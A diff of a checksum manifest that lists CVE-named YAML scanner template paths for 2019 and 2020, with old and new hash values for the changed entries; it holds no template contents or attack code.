+http/cves/2019/CVE-2019-16313.yaml:934a0a88e875cf40ee122f070b283fd96e56f1c6 +http/cves/2019/CVE-2019-16332.yaml:f6f478e2a686ba9eb5c8078684ae6c67aa09551d +http/cves/2019/CVE-2019-16525.yaml:b4b68d7f696cbde903c40984328983734eb52b72 http/cves/2019/CVE-2019-1653.yaml:9e347a5ccde409210fa1405799c0dac626118c5a http/cves/2019/CVE-2019-16662.yaml:c9b4f01ec8654736091cf91d87a68b85f9f39fdb http/cves/2019/CVE-2019-16759.yaml:970217cab18ec1954ebdbc242095d5c821f82088 http/cves/2019/CVE-2019-16920.yaml:6be8f64806236036dae115fc91793a7207c07d56 -http/cves/2019/CVE-2019-16931.yaml:6a272fef4d432250dfcb994eeb8b6fc3c4ac45d2 -http/cves/2019/CVE-2019-16932.yaml:3528a6efab647af9e084db610691d98e4abea6f0 -http/cves/2019/CVE-2019-16996.yaml:34153ce4f5e04c72b95e7d954eddb5e15bcdba29 -http/cves/2019/CVE-2019-16997.yaml:0ae0d182a1974e46a0bc5eb865a3b52613653816 -http/cves/2019/CVE-2019-17270.yaml:c9458c5267899cb7577022f3eccca1b347e4a6a1 +http/cves/2019/CVE-2019-16931.yaml:86089301a19dbecd5ffc099e7391d1cadfd166c0 +http/cves/2019/CVE-2019-16932.yaml:d6268dd122cd2621fc9ef024e52dedd2d3a2abf0 +http/cves/2019/CVE-2019-16996.yaml:b55696742ba7628b46424936ac1142f7579bc102 +http/cves/2019/CVE-2019-16997.yaml:a901cb8aef2d187c66c6f71922e0f4050fd331c4 +http/cves/2019/CVE-2019-17270.yaml:30235a72383b518418b1c752e57d2937701be621 http/cves/2019/CVE-2019-17382.yaml:6206536e62e28a68a7f727c43605740c913cee4b -http/cves/2019/CVE-2019-17418.yaml:59609d2a8365c45b5bf4a5ad72cb39053ddbf850 -http/cves/2019/CVE-2019-17444.yaml:8ff8a81e7a3c57e342bab633ba8b64a5d50c31ac -http/cves/2019/CVE-2019-17503.yaml:2eb48c9ccae39958852af06f22f3f6f87c108589 -http/cves/2019/CVE-2019-17506.yaml:ad37c4310508420d0642af48a48b000141c6c716 -http/cves/2019/CVE-2019-17538.yaml:d1b3383406699c8a2142687808fad65eace580e3 +http/cves/2019/CVE-2019-17418.yaml:23f87429b173d075ec4ccf8601c8baed661344a8 +http/cves/2019/CVE-2019-17444.yaml:68ee3a20106e526e28c5c58b52bbe6343c312f38 +http/cves/2019/CVE-2019-17503.yaml:b0fc2807efd59f9738cc7aa1fa2ac80b92fbe39c +http/cves/2019/CVE-2019-17506.yaml:29bd5e2ddff261e8233a88d011c27308e79ed670 +http/cves/2019/CVE-2019-17538.yaml:0add00aaa5b51792054b1c8b31402172cd2dc421 http/cves/2019/CVE-2019-17558.yaml:5999a649e06f781cb530d1bd2e30dd2e8f844268 -http/cves/2019/CVE-2019-17574.yaml:9e85ee721c084e844d822daa92efebb6db984fb5 -http/cves/2019/CVE-2019-17662.yaml:418149e92f5c355964421abc7494f111aba64b49 -http/cves/2019/CVE-2019-1821.yaml:e281b37ae9fbe57413bc3ed16ead483a3da1047d -http/cves/2019/CVE-2019-18371.yaml:7f425356f88a927ee830286b9ca806fa6c55c6d6 -http/cves/2019/CVE-2019-18393.yaml:a3506de3ff41bf8580955365c39e4b1ce71655cd -http/cves/2019/CVE-2019-18394.yaml:528a069e666eb8ca47d1fefa2f3d0174b0c82a17 -http/cves/2019/CVE-2019-18665.yaml:5af8f049c39766c2dfc0523256546ffcaf1883f9 -http/cves/2019/CVE-2019-18818.yaml:9dda8e037d74f15d4ddb741fec82c97527da890a -http/cves/2019/CVE-2019-18922.yaml:d3ac4668fedcffb05b68fcc63ce5cb25a2040a47 -http/cves/2019/CVE-2019-18957.yaml:9a1819c8c44d630ae20a229194c9b3d6d912b0b6 -http/cves/2019/CVE-2019-1898.yaml:f9f8209087b6c2397b185e2ab7b4e09bb53b65b6 -http/cves/2019/CVE-2019-19134.yaml:55e034287432c9494e3bbaad4b08f5d117cc3158 -http/cves/2019/CVE-2019-19368.yaml:a1fb903ca569f88c22b20e0e967984c5a04707b9 -http/cves/2019/CVE-2019-1943.yaml:dfaa39164472e0a9261edbf3c313f4d0294797f5 +http/cves/2019/CVE-2019-17574.yaml:5894b04db062e46fefdb869eb3d5b5235e54f43d +http/cves/2019/CVE-2019-17662.yaml:ca8492644172af8cc398d7eb3f996458f6e063e2 +http/cves/2019/CVE-2019-1821.yaml:5aea2029d8a56e935c833c7e798e5c8b029e0445 +http/cves/2019/CVE-2019-18371.yaml:6e33bb9372fe827d2d778200164d740e55d33c3b +http/cves/2019/CVE-2019-18393.yaml:01404da65b0a3f7927f716dc1945a686ef04fa1c +http/cves/2019/CVE-2019-18394.yaml:28f12935c49886c4743b7fa6915cfcce22dc49eb +http/cves/2019/CVE-2019-18665.yaml:dc34d514e7748eb94934bb3d734633dd427979e5 +http/cves/2019/CVE-2019-18818.yaml:d1368c41d7d4eaa90deb08daf91019bd014d75c3 +http/cves/2019/CVE-2019-18922.yaml:b2e671d513ef6421309213aa9968ab694e483d38 +http/cves/2019/CVE-2019-18957.yaml:4993b11caaa6e88f7ea4a868217b70ec85d3eb70 +http/cves/2019/CVE-2019-1898.yaml:bc67b398d4d46930e6b472094bb264be9386f7c4 +http/cves/2019/CVE-2019-19134.yaml:09312581c8f63945bce955b8c658c688d95b0f56 +http/cves/2019/CVE-2019-19368.yaml:6e88ecb51c0f3dadaf3e854cc24c85c9a833bb11 +http/cves/2019/CVE-2019-1943.yaml:acd7dca7b8dac4649d90fead2fd829d2365b9ebb http/cves/2019/CVE-2019-19781.yaml:77ca0fbff8c53656aafc4f2f100d49045794a8f9 http/cves/2019/CVE-2019-19824.yaml:f59400e9c0ebc6dd183c801de5ca562c30f0a94e -http/cves/2019/CVE-2019-19908.yaml:82391acbe130cc75f0bf707db0bd428bff3da2bb -http/cves/2019/CVE-2019-19985.yaml:2ded968408f3d6ef5119f45da48a916af23f7d0c -http/cves/2019/CVE-2019-20085.yaml:7ebebe096bf385512d5080025d611aa7e0434c71 -http/cves/2019/CVE-2019-20141.yaml:63b597379234d7b9560c128f835ad1813b30e98f -http/cves/2019/CVE-2019-20183.yaml:4a5f18f5fd1532a33e370ad4b1158d1bfbd3462a -http/cves/2019/CVE-2019-20210.yaml:3893cdd6c53dab9ce04a7cb78956e37b2ea7d47d -http/cves/2019/CVE-2019-20224.yaml:c4a28a4741e3d8c0544df57b16bcc023e633101a -http/cves/2019/CVE-2019-20933.yaml:fa34f1f496b8cd0df51b4f097cdba34b936d5b8a -http/cves/2019/CVE-2019-2578.yaml:ee98433fc703223e9ec005cc6d3e960fbfcf7669 -http/cves/2019/CVE-2019-2579.yaml:77d8c3fcb9617b5526f4b8a5613fceba02260b5b -http/cves/2019/CVE-2019-2588.yaml:05f87f7e191632dd1dd3f9bedc58ac63c1bd4137 +http/cves/2019/CVE-2019-19908.yaml:2c3ce5e6ce8e120995a61c36c184d6bb50261e53 +http/cves/2019/CVE-2019-19985.yaml:95668574ee02161603124578ba18863bbcd93f65 +http/cves/2019/CVE-2019-20085.yaml:fb58dddf26f4388a6e14f82fc1561c8d985f03bc +http/cves/2019/CVE-2019-20141.yaml:2a57696d46c96b51ae2172018eff890b80f2eb4f +http/cves/2019/CVE-2019-20183.yaml:7b697ee644efc731d0fe3bf93e9577f144f40cf4 +http/cves/2019/CVE-2019-20210.yaml:2dbe00b395184275f774b0cb1d3058c3dfff0ef7 +http/cves/2019/CVE-2019-20224.yaml:a68b24c2a01b343d1816440ccf77ff83b1790276 +http/cves/2019/CVE-2019-20933.yaml:c9b4ad05e2522393030da2be0913c8aa1b9eb572 +http/cves/2019/CVE-2019-2578.yaml:304f8313d622b61d7375e84e18ff70ff8c53fedb +http/cves/2019/CVE-2019-2579.yaml:d4c3e6cfc7ef0d5f1f581288d70d1b6b647548e9 +http/cves/2019/CVE-2019-2588.yaml:96dba19cdb14a9475baf4c9b13152c090ee0415a http/cves/2019/CVE-2019-2616.yaml:52b36a19622d3af8c361088dac073f40d113233a http/cves/2019/CVE-2019-2725.yaml:22b86011e9796d41e1d97ac5c78d0e153a2e539b -http/cves/2019/CVE-2019-2729.yaml:01dc0791d7817a41e8958d9d90b0522ff5c85a15 +http/cves/2019/CVE-2019-2729.yaml:acab1c146d7eb67fcb93ccb228f1b5a56b0c3d06 http/cves/2019/CVE-2019-2767.yaml:b3ef0216f6e79eafd6a3e06e0b7b2459f23e3222 http/cves/2019/CVE-2019-3396.yaml:8443caeaea63117cd1a6d64364a9480e11348860 http/cves/2019/CVE-2019-3398.yaml:162d020f2ba081570fefd290cf53d15bc92d17b1 -http/cves/2019/CVE-2019-3401.yaml:53c04dde0d02b3a81423470ea980b44f6bca1d59 -http/cves/2019/CVE-2019-3402.yaml:585e2a9b4457aef1bd5dfa32378e0ac0631d7a7c -http/cves/2019/CVE-2019-3403.yaml:f0c4adcdec6924f1a641081b2ce54050795c0eff -http/cves/2019/CVE-2019-3799.yaml:0de118de8e1350fc5965e5672c3922f118f7fffb -http/cves/2019/CVE-2019-3911.yaml:d38ff8485694b81d8a8234d370e86513122d5864 -http/cves/2019/CVE-2019-3912.yaml:33533552609d3274f8fe6babaf1dc80f78a377e4 -http/cves/2019/CVE-2019-3929.yaml:5b669d89f927298698a102ba1d8f25666853311b +http/cves/2019/CVE-2019-3401.yaml:98b3172151a8b36b78182f58f920e6d1756cd037 +http/cves/2019/CVE-2019-3402.yaml:e36d34fe02b2ae84ff72269b2a442ba6c776a4f3 +http/cves/2019/CVE-2019-3403.yaml:96bb2c20782c0616fa68192c85e58a9f00bad9b1 +http/cves/2019/CVE-2019-3799.yaml:9e1c43f9c1c67f6e93570fb86dc54cc469b44a82 +http/cves/2019/CVE-2019-3911.yaml:6b084933e3e171d1ec741074e0d96f2cdbfb7744 +http/cves/2019/CVE-2019-3912.yaml:e2215093d48ddccb1561f95dbc82d60a5d683fcf +http/cves/2019/CVE-2019-3929.yaml:751c4566f0457506d28d6b655946c40fcac14d94 http/cves/2019/CVE-2019-5127.yaml:33661abc937e1502b2c81106fd2b923f5e8e07fa http/cves/2019/CVE-2019-5418.yaml:af76701fa7ba485637689f6d96a37d8cf325b195 -http/cves/2019/CVE-2019-5434.yaml:60043179c8956dfb2073fd2c1ff62809884a102b -http/cves/2019/CVE-2019-6112.yaml:1471b2888583da094815f3887efec08bfaf0db56 -http/cves/2019/CVE-2019-6340.yaml:6b2b8e4ffe1a45b340cd89f6b3362d5cfc62050a -http/cves/2019/CVE-2019-6715.yaml:602fa3c0960621e65b6deb523973976495ca75da -http/cves/2019/CVE-2019-6799.yaml:17491f11532d0023eccf049aa0291bfece355da3 -http/cves/2019/CVE-2019-6802.yaml:061ae28b05e94c4fa08bca7adae83fb466c6ff3d -http/cves/2019/CVE-2019-7192.yaml:4a92c5d7b7d6ea79e6b742eb3af784ecdcef27cb -http/cves/2019/CVE-2019-7219.yaml:d375864a56e6e3f87bb26f3562dfc72da311423a -http/cves/2019/CVE-2019-7238.yaml:ad15c947499371ca496d205ea7aa317145445434 -http/cves/2019/CVE-2019-7254.yaml:a3a6f42f8726c2c794a6dc48e3ce7d5b515de92a -http/cves/2019/CVE-2019-7255.yaml:3a4306e738a155c4ae8e5f025b72a9ca7541e0ed +http/cves/2019/CVE-2019-5434.yaml:20838aa16da692bd252f175b47235ab309d86b45 +http/cves/2019/CVE-2019-6112.yaml:47884a3d3d526e6101fa481e3acef3c798eb69ce +http/cves/2019/CVE-2019-6340.yaml:4431ecf3593cf2582f991209de53d16391c4c874 +http/cves/2019/CVE-2019-6715.yaml:dff25399626083ac86c0d88703e00229b5374efd +http/cves/2019/CVE-2019-6799.yaml:db1588827d5bff56b522e880b965a80ac4fcb955 +http/cves/2019/CVE-2019-6802.yaml:7fb686cc6f69c90fcc0d42996e3d6ac9296364a6 +http/cves/2019/CVE-2019-7192.yaml:733f264066990d6afcc0b3475976a1ffd964b6d7 +http/cves/2019/CVE-2019-7219.yaml:406a4683ee4d6694233658377a7edefc48c3544c +http/cves/2019/CVE-2019-7238.yaml:237d9cfea9bd08b999e14e4393ecac6aebaaa864 +http/cves/2019/CVE-2019-7254.yaml:b954f7cb5c3948cefc4e2a6d0ba41df6046ffe8b +http/cves/2019/CVE-2019-7255.yaml:32dca705c6ca35aa1fc151f66f81a66e77f9f303 http/cves/2019/CVE-2019-7256.yaml:58cc721331c31d795c297747d26858941fe5c9b7 -http/cves/2019/CVE-2019-7275.yaml:bc083726e88fdda5e207a97bcea394b582ca77d1 -http/cves/2019/CVE-2019-7315.yaml:a6ea8a64655ba72e539b5d67a8e21b7551d98840 -http/cves/2019/CVE-2019-7481.yaml:577070676aa3ba8b3b5b60b5b3917ae67cc18520 -http/cves/2019/CVE-2019-7543.yaml:dc533090717f4e421f1410c973c3ac3f34c70acf -http/cves/2019/CVE-2019-7609.yaml:57bf1128463c4d97ef70a1e5765d0eec10f0f486 -http/cves/2019/CVE-2019-8086.yaml:fdf3fe30ab76098d514f5af8471bc84785729181 -http/cves/2019/CVE-2019-8390.yaml:1c48134cfb1c2813531c29f0653c96fcab583f49 -http/cves/2019/CVE-2019-8442.yaml:8f40a17b58c1fb669e368982373272e1eae35eb7 -http/cves/2019/CVE-2019-8446.yaml:a9bf51fd6e3a7f4ce63114396261d2ba01faf555 -http/cves/2019/CVE-2019-8449.yaml:d4d1b85343e8f3bceb258852f788a864a5abad47 +http/cves/2019/CVE-2019-7275.yaml:9a601dd7b71c04c828a4c97cc98948769c109f89 +http/cves/2019/CVE-2019-7315.yaml:a189936d8a07f0b9ed1fe3464fdabe7277286e27 +http/cves/2019/CVE-2019-7481.yaml:6aa0c3aea364c52cd39ad7ece2544ad77332044f +http/cves/2019/CVE-2019-7543.yaml:838a82d20efed1a16f49d27054d2e77248023cee +http/cves/2019/CVE-2019-7609.yaml:335c3c6419d2231eb306781c0db0ba0c4e95b6b5 +http/cves/2019/CVE-2019-8086.yaml:089230353e8a3ffe7b165c0fdfa63a0a20b79b78 +http/cves/2019/CVE-2019-8390.yaml:643a14433e6127af7d213bfe662d71686c538444 +http/cves/2019/CVE-2019-8442.yaml:b4b3c167d895b6abf09c2dba44908aef80762654 +http/cves/2019/CVE-2019-8446.yaml:2115a90670746e7515ad5baf5bd33ba1f5305bf3 +http/cves/2019/CVE-2019-8449.yaml:cf12abc70e678238d86e4fc5e32da295440eeffe http/cves/2019/CVE-2019-8451.yaml:43e17eb213a838155503d82502c237d524ccb68c -http/cves/2019/CVE-2019-8903.yaml:b31a079466604f1fe7b6ff33683f94ed8d1f5535 -http/cves/2019/CVE-2019-8937.yaml:bfca210bb983bb89165c1911b5c283c5ce7de908 -http/cves/2019/CVE-2019-8982.yaml:cfa65760a3a598672ab57c49a443ca754f672c33 -http/cves/2019/CVE-2019-9041.yaml:2c78562cd0fcf12763b09e29d456c73fec3efdd4 -http/cves/2019/CVE-2019-9618.yaml:a2bd0d70b8a2b22c7a5b126659c21f8f1275ee9e +http/cves/2019/CVE-2019-8903.yaml:bb59a545453c62e31dbcd5a638d2a29bcea8e365 +http/cves/2019/CVE-2019-8937.yaml:58585634a0720d4a60a2cec3ffb3b07001ca38d5 +http/cves/2019/CVE-2019-8982.yaml:cfe93a775948588cbefab3973aba00bd823d851b +http/cves/2019/CVE-2019-9041.yaml:d0b4b978379c85e1d4c4d27cd62427ca87fa9f98 +http/cves/2019/CVE-2019-9618.yaml:781328bfa13327128d93c148fc03548ae1385b8a http/cves/2019/CVE-2019-9670.yaml:341d12e638e00cbf1829d67e049da70d367db1c7 -http/cves/2019/CVE-2019-9726.yaml:47f4eb1197ffcf45aeda580ce20602d6f06426a7 -http/cves/2019/CVE-2019-9733.yaml:e794dcde1da8f1112e89d2a22cde7b224b2f5237 -http/cves/2019/CVE-2019-9915.yaml:31a0bf24fb5af10aaac34eb892796377694c9fb7 -http/cves/2019/CVE-2019-9922.yaml:f8b93a73bc64d9b8db6639d34423e504c8a3bba4 -http/cves/2019/CVE-2019-9955.yaml:e7cae75a5af413c8b0f69727660aa5d31a673b28 +http/cves/2019/CVE-2019-9726.yaml:8720262708ccaed906882edd3e75be428a6a3e28 +http/cves/2019/CVE-2019-9733.yaml:a45f0889423518196e7d56b5545c76102a31c82c +http/cves/2019/CVE-2019-9915.yaml:2de5cd22f0cef0b561175f9cfc4f1a6a13cd860e +http/cves/2019/CVE-2019-9922.yaml:0de4b13790f3071cf538ef3d2cc7f5e3f01aeebb +http/cves/2019/CVE-2019-9955.yaml:32f62f62a557a8221264448cf0bbf9b9dc4d19d3 http/cves/2019/CVE-2019-9978.yaml:e85dbefabd52e8fa0fe20796aa448c24ef439dbf http/cves/2020/CVE-2020-0618.yaml:2a1354cce8162a667175e738f3724bffd7a6c5e1 -http/cves/2020/CVE-2020-10148.yaml:3547825407c206a4ff4a8bb5f794c46fe230af09 -http/cves/2020/CVE-2020-10199.yaml:7eb79fe48b6c117b72784147e7b0af1c471be08e -http/cves/2020/CVE-2020-10220.yaml:2d55defd7093310ee6a9847094eb717f517a7e6b -http/cves/2020/CVE-2020-10546.yaml:d8ddfd2f9e0b7eb74cb9bea70cac52b51ce9d2dc -http/cves/2020/CVE-2020-10547.yaml:7b93793a6b8e052e5f622ff501f5c88bed1be4b2 -http/cves/2020/CVE-2020-10548.yaml:01e3878f62092732160498243f1c33b1ecd924d8 -http/cves/2020/CVE-2020-10549.yaml:7c46d7ef85a694f8f2c11e8e65ef04673444062e -http/cves/2020/CVE-2020-10770.yaml:2d4639146eb14cecf4b988ce2bdcaf50798683a3 -http/cves/2020/CVE-2020-10973.yaml:814be8bcaf3e87399680294df18816acaa1a40c6 -http/cves/2020/CVE-2020-11034.yaml:1d899d444f027174c3e8d4577ca1450f45011403 -http/cves/2020/CVE-2020-11110.yaml:892b34947f41a31ca5b221e6f9e7288792c9e01b -http/cves/2020/CVE-2020-11450.yaml:b10c6a4d223a5719f45883ea49dc7b035c50a0aa -http/cves/2020/CVE-2020-11455.yaml:166c33f1659c4f05acbb9cdb3f3b6c75fdfcc774 -http/cves/2020/CVE-2020-11529.yaml:9acb6ce6ac9dc5de6fe9a18161b91fd818d32c7e -http/cves/2020/CVE-2020-11530.yaml:95e81e92352ca3f33d3e657e5ce030346969bd51 +http/cves/2020/CVE-2020-10148.yaml:f38f44f19ef3fdbfbee0cd156d1ce81cc89e0736 +http/cves/2020/CVE-2020-10199.yaml:f223a08e76bf7ed5839c6cd960c68697661b8fa3 +http/cves/2020/CVE-2020-10220.yaml:6cbfe5f3f1d52d5ccb83678df05812bee1b05bc9 +http/cves/2020/CVE-2020-10546.yaml:fa433735e907ba98ea36c715730e32a429e752e4 +http/cves/2020/CVE-2020-10547.yaml:223e86862efa1a58306d557283ff58886b8bed34 +http/cves/2020/CVE-2020-10548.yaml:bdabf7eaa816f61acbfe3ee0879c6f5ad1e6a0dc +http/cves/2020/CVE-2020-10549.yaml:899f6dbee7f3caf8b8a8f64c41f460ca24a7ec41 +http/cves/2020/CVE-2020-10770.yaml:2916972f833961b664cc588f02f4583d7ba01e0b +http/cves/2020/CVE-2020-10973.yaml:bcc276b5c4e323cf472fdb852e6786234ff50e1d +http/cves/2020/CVE-2020-11034.yaml:ea7f3b04b34bf47c12f91352a8ab2bba34053319 +http/cves/2020/CVE-2020-11110.yaml:eba4faa7e5feaf6128743790f85f15394279e8b3 +http/cves/2020/CVE-2020-11450.yaml:bd0f2190b0168298f3d057edea75a629e1fbd858 +http/cves/2020/CVE-2020-11455.yaml:3af5aad304b3c4a48b7861781e99dd1cf8db5406 +http/cves/2020/CVE-2020-11529.yaml:7b9cc57c34f1c8929f0c644fab63d1ff3d37346d +http/cves/2020/CVE-2020-11530.yaml:bbd63e23e10e022d4ca5f77291b9dfaa1b187efe http/cves/2020/CVE-2020-11546.yaml:9e82ec6d2c69c59d10b6d497545cd8f74b3d09fa -http/cves/2020/CVE-2020-11547.yaml:6da5ae0c6db90d873ac3e62405adfa72a7653519 -http/cves/2020/CVE-2020-11710.yaml:019cfcd1effa8677e0be674b4f3bdfde71af2585 +http/cves/2020/CVE-2020-11547.yaml:82f58678b26366623aff33e93007a35196016715 +http/cves/2020/CVE-2020-11710.yaml:89a1926bc73de4e879c44d3994759ad3cc9bf2d5 http/cves/2020/CVE-2020-11738.yaml:3c17a2a7998bb63dad2915af224bdbb9155e5c47 -http/cves/2020/CVE-2020-11798.yaml:5f04f223ba5991b55856693caa70d537e79fdf96 -http/cves/2020/CVE-2020-11853.yaml:36cda8ee11ae666c727698106888fe7508450435 -http/cves/2020/CVE-2020-11854.yaml:adbe91e241775b66562985b2b108475914fa3cd2 -http/cves/2020/CVE-2020-11930.yaml:4208b2125078eed6c73f0df1fa18afdafc4bf8c5 +http/cves/2020/CVE-2020-11798.yaml:b8878ea0d80b62b01f7ab38e8f9267080b3424f5 +http/cves/2020/CVE-2020-11853.yaml:861aa98d7d25ecc2a9246babe6123d0d3fbc3328 +http/cves/2020/CVE-2020-11854.yaml:0b16013788a78f3f8d671c187c8f62e4f3500045 +http/cves/2020/CVE-2020-11930.yaml:8b8f216e625fa6793d5917e265c1a4f647638c1e http/cves/2020/CVE-2020-11978.yaml:b40478456746a978305b9baace251c063914f4b4 -http/cves/2020/CVE-2020-11991.yaml:cc52f4774f3498100e4fcf9c64662f3b0639250a -http/cves/2020/CVE-2020-12054.yaml:6bd6db590ce9436cdd588bba0987fa18bed33262 +http/cves/2020/CVE-2020-11991.yaml:1f5a1ffe53688a0fc0bc2abfbd118dc0ee43c9e4 +http/cves/2020/CVE-2020-12054.yaml:f22e794835d7ef6c3d520624e7a5a7b28d1359b7 http/cves/2020/CVE-2020-12116.yaml:e8e63c03ae8898dd630b6610429f6d86aff3add4 -http/cves/2020/CVE-2020-12127.yaml:652a6c2b269f71f4757e40fbe3dddbebdbd5a289 -http/cves/2020/CVE-2020-12256.yaml:6aca3e5cd051cda66c73304418ea1bbdc0098c5d +http/cves/2020/CVE-2020-12127.yaml:dfc2ac7933295deeb524f6946e0e3bdb876ef653 +http/cves/2020/CVE-2020-12256.yaml:4a7fee67cb8cb67fc02561c50dcdd9b9ae099eb7 http/cves/2020/CVE-2020-12259.yaml:f77c099ec9f18b2bbe3df65fa4a343b2f5923cf2 -http/cves/2020/CVE-2020-12447.yaml:2116a411cd2c01c1516823df265d0ab4d10f0984 -http/cves/2020/CVE-2020-12478.yaml:bc2cf7efe43b37d9043d3248c4e5f9ad9c2fd72c -http/cves/2020/CVE-2020-12720.yaml:932de25754e148d546479d79487dddfe0285527b +http/cves/2020/CVE-2020-12447.yaml:c8de4b2ca3eea7fa73796b5d17f97800ded11a8f +http/cves/2020/CVE-2020-12478.yaml:7f0bf579020df67f665e2843093eeb54c7f19ce0 +http/cves/2020/CVE-2020-12720.yaml:4d15881e452306175de342af05a98488f61ac817 http/cves/2020/CVE-2020-12800.yaml:e50502c683b6f9373dca94f7d902161a3c43b490 -http/cves/2020/CVE-2020-13117.yaml:50e4c14a6a5fb7f7132914d7f32591fd0b158743 -http/cves/2020/CVE-2020-13121.yaml:8bb01f3ab1da2496a16db39bed6397207f3926f3 -http/cves/2020/CVE-2020-13158.yaml:c4de31b95232e85a00712dfb9dfc146083c46349 +http/cves/2020/CVE-2020-13117.yaml:581986c29992c011e51f2759ab024dd2b7494056 +http/cves/2020/CVE-2020-13121.yaml:e9b4c69c89260a7d126b6b550e51baef5245c157 +http/cves/2020/CVE-2020-13158.yaml:93a0f714a67be95fb28cbf95d73e9ccd7ab01221 http/cves/2020/CVE-2020-13167.yaml:83148b2047628f44f4ca6bb170d8bee2ee62b656 -http/cves/2020/CVE-2020-13258.yaml:7b3104929c354b104d4ffdf2fa5b0e651673989d -http/cves/2020/CVE-2020-13379.yaml:0827bdcbfa4df1a90f8c897a8040c238f4462607 -http/cves/2020/CVE-2020-13405.yaml:936ed5d02618087b7ad46d7cb9b890500e4cd53c -http/cves/2020/CVE-2020-13483.yaml:f2437f5084f0826604f5989fe9eedb04f93c06b6 -http/cves/2020/CVE-2020-13638.yaml:82f3fa1578987ba21866f19cc110e05e6299d395 -http/cves/2020/CVE-2020-13700.yaml:5ccfb027660b7a8bc5f3a16aa3c5449c95b87823 -http/cves/2020/CVE-2020-13820.yaml:c0a3088eb822a0751726ceaa079fe449aff4de76 -http/cves/2020/CVE-2020-13851.yaml:4c95edb285cbd0d90bf4bf1e5662d302b224f92b +http/cves/2020/CVE-2020-13258.yaml:4319f461593073c7c25f28c5d7b6c5431b94414d +http/cves/2020/CVE-2020-13379.yaml:e2a7f905fc5afeda0b52b9ad8a9b91dc6407832e +http/cves/2020/CVE-2020-13405.yaml:f4b119e2bde0a37849c0db2ac60c1c8eae30ec5f +http/cves/2020/CVE-2020-13483.yaml:783b97d2085fbbf7e4505a6ac8a128c126e5f0d3 +http/cves/2020/CVE-2020-13638.yaml:ee703a06000f8ea411d0f7ae5778b1b302c7549b +http/cves/2020/CVE-2020-13700.yaml:9661a935e3f68da38c601060d5a7e17bb8cbcbfa +http/cves/2020/CVE-2020-13820.yaml:3e55b4cc9d8844568cf3e11ca8739679b5362d53 +http/cves/2020/CVE-2020-13851.yaml:34ba2f62db6df390e4b7fd918fc6758e1327d9f6 http/cves/2020/CVE-2020-13927.yaml:67c237c3cef696cdd04c7d1f7f170e01615a93fd -http/cves/2020/CVE-2020-13937.yaml:5c5de480085895b14eeba896b2182a243e14d9f2 -http/cves/2020/CVE-2020-13942.yaml:0fbafe7d8ca74c802970b83a95676335394bfab5 -http/cves/2020/CVE-2020-13945.yaml:19e665b594552d7e2dcb04bb55eeccab64783ee7 -http/cves/2020/CVE-2020-14092.yaml:c3b157533787a4d56dae0b8cb2609353d42497a4 -http/cves/2020/CVE-2020-14144.yaml:f0cf3db1219528575d5e3900678bfb6a3b0e6e03 -http/cves/2020/CVE-2020-14179.yaml:8d48998cb648a66d1bd81c4210f714b4554e570b -http/cves/2020/CVE-2020-14181.yaml:123859c0070c3fef8ad18a3eff982ef4cfc81c44 -http/cves/2020/CVE-2020-14408.yaml:cd3fbf8b04b51b2a311ad0f92468d34165e9e055 -http/cves/2020/CVE-2020-14413.yaml:0fc16adef86357152dbf8a111bb64e0aa3563b0b +http/cves/2020/CVE-2020-13937.yaml:22a3930a4af52b84427387c22a7aef70ba5991ea +http/cves/2020/CVE-2020-13942.yaml:98259fa7e8124878a67f15c5d330ab5c12ded6a9 +http/cves/2020/CVE-2020-13945.yaml:7ff0ddaf1a0e2abdc845d2f08afb1aba8168fdc0 +http/cves/2020/CVE-2020-14092.yaml:ba422c56d08226e051ac02d210e83233036f0aed +http/cves/2020/CVE-2020-14144.yaml:5b306d6a6872c9202962d7fe9f1b508815de6cc2 +http/cves/2020/CVE-2020-14179.yaml:3a34c56bdd57bac9a5c509409db65c914f48bf16 +http/cves/2020/CVE-2020-14181.yaml:5a943c7a23bab46795ccb5f724e9bdf9e46cfc85 +http/cves/2020/CVE-2020-14408.yaml:66fa60e1bb86fc21729c3a4b6fe5d78ab01d3725 +http/cves/2020/CVE-2020-14413.yaml:12b2777eed719e1bf4ba70c9853f7844fd79fefe http/cves/2020/CVE-2020-14750.yaml:416ad3daa80469c8c0f84539d9bfe9a2e649fcab -http/cves/2020/CVE-2020-14864.yaml:18d16fcff176988c025b9ac04938512688dd7b6d +http/cves/2020/CVE-2020-14864.yaml:6fe3e18691d8cb9314b13f7d6505008d74b579f9 http/cves/2020/CVE-2020-14882.yaml:75bbfc11c2928d9fbad52a4302f67eb912435b4d http/cves/2020/CVE-2020-14883.yaml:2ec44d8e3d0b7042fbb4afe4118a872b7f6ab7a4 -http/cves/2020/CVE-2020-15050.yaml:92692bd67e2f13400b46354d34428d12c2e639b8 -http/cves/2020/CVE-2020-15129.yaml:de2e0a1143728fd07d09f131406659f8637c9696 -http/cves/2020/CVE-2020-15148.yaml:815c601513000fc95895aef49dd41ac5ee12f903 +http/cves/2020/CVE-2020-15050.yaml:60c2a536575bc04bbe9df90ab3f6f5fe0459bdd9 +http/cves/2020/CVE-2020-15129.yaml:7ba97dcf3cef5222f2c1d7045cc89a733a09263c +http/cves/2020/CVE-2020-15148.yaml:90c0a55d46eff10549ca26b59ba75010fb2ecdf9 http/cves/2020/CVE-2020-15227.yaml:7efaa8e60493e38f58afddfb17826bad19551b53 -http/cves/2020/CVE-2020-15500.yaml:bd0af16a9f7613735184c61fd11a4d1fa5116a9c -http/cves/2020/CVE-2020-15505.yaml:43f4b56268ae3c18bcf1dba9eef555e3d0edf58e +http/cves/2020/CVE-2020-15500.yaml:a94d2aacbad244733621e93a94cb4b3694deebae +http/cves/2020/CVE-2020-15505.yaml:dff6553a11aee0d377710b2672a7c51c96dad6c9 http/cves/2020/CVE-2020-15568.yaml:e65a946b833c4aa1dfcd3a3ee1e0f7abe36cdb80 -http/cves/2020/CVE-2020-15867.yaml:8a798a3380f0c2bbb09c1d9f690cb74771f1d250 -http/cves/2020/CVE-2020-15895.yaml:d1fba73736664726767381cbb8918c6c7d9edaf2 +http/cves/2020/CVE-2020-15867.yaml:18322318f47c28816ffc37ea9e4bebb15913e185 +http/cves/2020/CVE-2020-15895.yaml:de54389eec7bca1ff585ca94199d8f64b5b79706 http/cves/2020/CVE-2020-15920.yaml:46aaa5d519f4feb32bb872443fdb9ad2f19bf597 -http/cves/2020/CVE-2020-16139.yaml:7e5818e73c4eebe3cd990c89eeb539008ae13844 +http/cves/2020/CVE-2020-16139.yaml:56afa4dd6a1ff3e3d5c3d05abf1f26bb5ca01acd http/cves/2020/CVE-2020-16846.yaml:c5e01368bfc4f7d5a60555e3f2aa58d64968a5a5 -http/cves/2020/CVE-2020-16952.yaml:a7092bf3f2bfb1a5d99e414a67525a99823fb414 